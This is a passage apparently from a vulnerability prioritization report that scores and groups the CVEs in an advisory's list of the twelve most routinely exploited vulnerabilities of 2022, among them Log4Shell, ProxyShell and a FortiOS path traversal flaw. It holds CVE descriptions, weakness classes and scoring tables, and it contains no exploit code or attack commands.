Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22954 VMware Workspace ONE Access and Identity Manager RCE CWE-94 Improper Control of Generation of Code ('Code Injection')
8. Remote Code Execution - Zoho ManageEngine ADSelfService Plus (CVE-2021-40539) - Urgent [916]
Description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-40539 Zoho ManageEngine ADSelfService Plus RCE/ Authentication Bypass CWE-287 Improper Authentication
9. 
Security Feature Bypass - Microsoft Exchange (CVE-2021-31207) - Urgent [913]
Description: Microsoft Exchange Server Security Feature Bypass Vulnerability
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-31207 (Proxy Shell) Microsoft Exchange Server Security Feature Bypass CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
10. 
Elevation of Privilege - Microsoft Exchange (CVE-2021-34523) - Urgent [865]
Description: Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34470.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34523 (Proxy Shell) Microsoft Exchange Server Elevation of Privilege CWE-287 Improper Authentication
11. 
Path Traversal - FortiOS (CVE-2018-13379) - Urgent [809]
Description: An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (AttackerKB object, CISA object), AttackerKB websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure, FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit), FortiOS 5.6.7 / 6.0.4 Credential Disclosure, FortiOS 5.6.7 / 6.0.4 Credential Disclosure, FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit (2), FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit, Fortinet FortiGate SSL VPN File Disclosure, Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure, Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)) |
| Criticality of Vulnerability Type | 0.4 | 15 | Path Traversal |
| Vulnerable Product is Common | 0.5 | 14 | FortiOS is Fortinet's operating system used in their hardware, such as the Fortigate firewall and switches |
| CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to NVD data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97486, EPSS Percentile is 0.99951 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2018-13379 Fortinet FortiOS and FortiProxy SSL VPN credential exposure CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Critical (1)
12. Elevation of Privilege - VMware Workspace One (CVE-2022-22960) - Critical [732]
Description: VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to 'root'.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22960 VMware Workspace ONE Access, Identity Manager, and vRealize Automation Improper Privilege Management CWE-269 Improper Privilege Management
High (0)
Medium (0)
Low (0)
Exploitation in the wild detected (12)
Remote Code Execution (7)
- Apache Log4j2 (CVE-2021-44228)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-44228 (Log4Shell) Apache Log4j2 RCE CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CWE-502 Deserialization of Untrusted Data
- Microsoft Exchange (CVE-2021-34473)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34473 (Proxy Shell) Microsoft Exchange Server RCE CWE-918 Server-Side Request Forgery (SSRF)
- Confluence Server (CVE-2021-26084, CVE-2022-26134)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-26084 Atlassian Confluence Server and Data Center Arbitrary code execution CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-26134 Atlassian Confluence Server and Data Center RCE CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
- Microsoft Windows Support Diagnostic Tool (MSDT) (CVE-2022-30190)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-30190 Microsoft Multiple Products RCE None Listed
- VMware Workspace One (CVE-2022-22954)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22954 VMware Workspace ONE Access and Identity Manager RCE CWE-94 Improper Control of Generation of Code ('Code Injection')
- Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-40539 Zoho ManageEngine ADSelfService Plus RCE/ Authentication Bypass CWE-287 Improper Authentication
Authentication Bypass (1)
- BIG-IP (CVE-2022-1388)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-1388 F5 Networks BIG-IP Missing Authentication Vulnerability CWE-306 Missing Authentication for Critical Function
Security Feature Bypass (1)
- Microsoft Exchange (CVE-2021-31207)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-31207 (Proxy Shell) Microsoft Exchange Server Security Feature Bypass CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Elevation of Privilege (2)
- Microsoft Exchange (CVE-2021-34523)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34523 (Proxy Shell) Microsoft Exchange Server Elevation of Privilege CWE-287 Improper Authentication
- VMware Workspace One (CVE-2022-22960)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-22960 VMware Workspace ONE Access, Identity Manager, and vRealize Automation Improper Privilege Management CWE-269 Improper Privilege Management
Path Traversal (1)
- FortiOS (CVE-2018-13379)
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2018-13379 Fortinet FortiOS and FortiProxy SSL VPN credential exposure CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Public exploit exists, but exploitation in the wild is NOT detected (0)
Other Vulnerabilities (0)